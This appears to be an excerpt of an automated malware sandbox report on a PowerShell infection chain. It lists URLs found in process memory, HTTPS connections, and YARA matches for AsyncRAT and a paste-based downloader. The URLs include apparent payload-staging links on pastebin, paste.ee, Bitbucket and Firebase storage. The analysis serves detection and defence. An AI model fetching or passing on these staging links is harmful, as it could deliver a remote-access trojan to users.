                Source: powershell.exe, 00000004.00000002.2176643102.000002870195E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7D11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://firebasestorage.googleapis.com
                Source: powershell.exe, 00000004.00000002.2176643102.0000028701A14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2254576347.000002871007F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2150319912.000002C0E23D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2150319912.000002C0E229F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2133813473.000002C0D3ADD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7D48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2578721401.00000272E6413000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2507053683.0000027C1CBAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2507053683.0000027C1CCE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2352027899.0000027C0E40D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://paste.ee
                Source: powershell.exe, 00000004.00000002.2176643102.0000028701648000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701664000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.000002870164D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D79FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
                Source: powershell.exe, 0000000E.00000002.2396453856.00000272D48DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com/raw/V9y5Q5vv
                Source: powershell.exe, 00000004.00000002.2270156438.000002877C720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com/raw/v9y5q5vv
                Source: powershell.exe, 0000000F.00000002.2352027899.0000027C0E386000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s3-w.us-east-1.amazonaws.com
                Source: powershell.exe, 00000002.00000002.2293886906.0000019BAE651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2133813473.000002C0D2221000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.3349422989.0000000003081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2615790449.000001A1A5AD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D63A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2352027899.0000027C0CB31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000005.00000002.2133813473.000002C0D384B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2352027899.0000027C0E2E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: powershell.exe, 0000000F.00000002.2352027899.0000027C0E386000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000002.00000002.2293886906.0000019BAE670000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2293886906.0000019BAE6BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2133813473.000002C0D2221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2615790449.000001A1A5A2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2615790449.000001A1A5A16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D63A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2352027899.0000027C0CB31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000004.00000002.2176643102.00000287003CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D676A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
                Source: powershell.exe, 00000004.00000002.2176643102.00000287003CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D676A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
                Source: powershell.exe, 00000004.00000002.2176643102.000002870168C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701664000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287003E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D6782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
                Source: powershell.exe, 0000000E.00000002.2403141075.00000272D6782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
                Source: powershell.exe, 0000000E.00000002.2403141075.00000272D6782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
                Source: powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazoh
                Source: powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazohx
                Source: powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D67E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com
                Source: powershell.exe, 00000004.00000002.2176643102.0000028700443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/5c1faa65-8df1-44b3-9eef-4905cfb21066/downloads/153f1b3b-a7e8-
                Source: powershell.exe, 00000004.00000002.2176643102.0000028700443000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.comp
                Source: powershell.exe, 00000004.00000002.2176643102.00000287003EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287016B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D678B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org
                Source: powershell.exe, 0000000E.00000002.2403141075.00000272D7A69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D678B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/89999999999999/acaaaaaaaaa/downloads/dsadsdsadsadsa.txt
                Source: powershell.exe, 00000004.00000002.2176643102.00000287016B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/89999999999999/acaaaaaaaaa/downloads/dsadsdsadsadsa.txtP
                Source: powershell.exe, 00000004.00000002.2176643102.000002870168C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701664000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287003E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D6782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                Source: powershell.exe, 00000004.00000002.2176643102.00000287003CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D676A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
                Source: powershell.exe, 00000004.00000002.2176643102.00000287003CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D676A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
                Source: powershell.exe, 0000000F.00000002.2352027899.0000027C0E40D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 0000000F.00000002.2352027899.0000027C0E40D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 0000000F.00000002.2352027899.0000027C0E40D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000004.00000002.2176643102.000002870168C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701664000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287003E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D6782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                Source: powershell.exe, 00000004.00000002.2176643102.0000028700443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.000002870195E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7D11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D67E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firebasestorage.googleapis.com
                Source: powershell.exe, 0000000E.00000002.2403141075.00000272D7D11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D67E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/Pe%2Fp.txt?alt=media&token=
                Source: powershell.exe, 00000004.00000002.2176643102.000002870195E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7D11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firebasestorage.googleh
                Source: powershell.exe, 00000004.00000002.2176643102.00000287003CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D676A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                Source: powershell.exe, 00000004.00000002.2176643102.00000287003CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D676A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
                Source: powershell.exe, 0000000F.00000002.2352027899.0000027C0E386000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000004.00000002.2176643102.0000028701199000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D73E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 00000004.00000002.2176643102.0000028701A14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2254576347.000002871007F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2150319912.000002C0E23D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2150319912.000002C0E229F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2133813473.000002C0D3ADD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7D48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2578721401.00000272E6413000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2507053683.0000027C1CBAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2507053683.0000027C1CCE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2352027899.0000027C0E40D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000005.00000002.2133813473.000002C0D384B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2352027899.0000027C0E2E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                Source: powershell.exe, 00000005.00000002.2133813473.000002C0D384B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2352027899.0000027C0E2E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                Source: powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee
                Source: powershell.exe, 00000004.00000002.2176643102.0000028700596000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D6937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/lHbHo/0
                Source: powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/lHbHo/0P
                Source: powershell.exe, 00000004.00000002.2176643102.000002870058A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287003BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.000002870164D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D692B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D675B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                Source: powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw
                Source: powershell.exe, 0000000E.00000002.2403141075.00000272D7A00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/V9y5Q5vv
                Source: powershell.exe, 00000004.00000002.2176643102.000002870058A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D692B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/cD7bJS7b
                Source: powershell.exe, 00000004.00000002.2176643102.0000028700443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D67E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/sFgsbG3v
                Source: powershell.exe, 00000004.00000002.2176643102.000002870168C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701664000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287003E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D6782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                Source: powershell.exe, 00000004.00000002.2176643102.000002870168C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701664000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287003E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D6782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                Source: powershell.exe, 00000004.00000002.2176643102.00000287003CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D676A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
                Source: powershell.exe, 00000004.00000002.2176643102.00000287003CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D676A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
                Source: powershell.exe, 00000004.00000002.2176643102.000002870168C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701664000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287003E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D6782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                Source: powershell.exe, 00000004.00000002.2176643102.00000287003CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D676A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: powershell.exe, 00000004.00000002.2176643102.00000287003CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D676A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                Source: powershell.exe, 00000004.00000002.2176643102.00000287003CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D676A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 52.216.144.11:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49711 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:49722 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.5:49723 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.5.25.83:443 -> 192.168.2.5:49724 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49728 version: TLS 1.2

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 4.2.powershell.exe.2877ca20000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables (downloaders) containing reversed URLs to raw contents of a paste Author: ditekSHen
                Source: 4.2.powershell.exe.2877ca20000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects known downloader agent Author: ditekSHen
                Source: 16.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 4.2.powershell.exe.287005f0550.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 14.2.powershell.exe.272d6990dc0.3.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 4.2.powershell.exe.287005ed138.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 14.2.powershell.exe.272d6819978.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables (downloaders) containing reversed URLs to raw contents of a paste Author: ditekSHen
                Source: 14.2.powershell.exe.272d6819978.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects known downloader agent Author: ditekSHen
                Source: 14.2.powershell.exe.272d698d9a8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 4.2.powershell.exe.28700478df0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables (downloaders) containing reversed URLs to raw contents of a paste Author: ditekSHen
                Source: 4.2.powershell.exe.28700478df0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects known downloader agent Author: ditekSHen
                Source: 14.2.powershell.exe.272d7b8ec50.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables (downloaders) containing reversed URLs to raw contents of a paste Author: ditekSHen
                Source: 14.2.powershell.exe.272d7b8ec50.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects known downloader agent Author: ditekSHen
                Source: 4.2.powershell.exe.287017daf68.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables (downloaders) containing reversed URLs to raw contents of a paste Author: ditekSHen
                Source: 4.2.powershell.exe.287017daf68.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects known downloader agent Author: ditekSHen
                Source: 00000004.00000002.2176643102.00000287005E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
